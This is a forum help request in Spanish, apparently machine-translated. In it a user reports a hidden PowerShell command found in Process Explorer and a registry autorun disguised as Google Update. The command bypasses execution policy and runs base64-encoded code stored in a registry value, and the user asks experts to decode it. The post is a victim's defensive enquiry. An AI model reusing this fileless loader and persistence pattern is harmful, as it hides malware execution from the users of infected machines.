Obtengo esta línea por ProcessExplorer
C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe "-noprofile -windowstyle oculto -executionpolicy bypass iex ([Text.Encoding] :: ASCII.GetString ([Convert] :: FromBase64String ((gp 'HKCU: \ Software \ Classes \ ZXWNMNLIMAGAL'). LOOTDA)))
Ahora estoy seguro de que puede ser un virus codificado cuando leo esto desde el registro:
Actualización de Google REG_SZ
"C: \ Users \ michael \ AppData \ Local \ Google \ Update \ GoogleUpdate.exe" / c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C: \ Windows \ system32 \ WindowsPowerShell \ v1.0 \ powershell.exe -noprofile -windowstyle oculto -executionpolicy bypass iex ([Text.Encoding] :: ASCII.GetString ([Convert] :: FromBase64String ((gp 'HKCU: \ Software \ Classes \ ZXWNMNLIMAGAL'). LOOTDA)))
Entonces, exporté el valor de datos LOOTDA
del registro y lo copio como archivo de texto y lo subo
aquí
Por lo tanto, estoy buscando a cualquier experto en cifrado y descifrado para descifrar y descifrar este tipo de virus para leer su código fuente y lo que podría ser perjudicial para nosotros.
¡Gracias!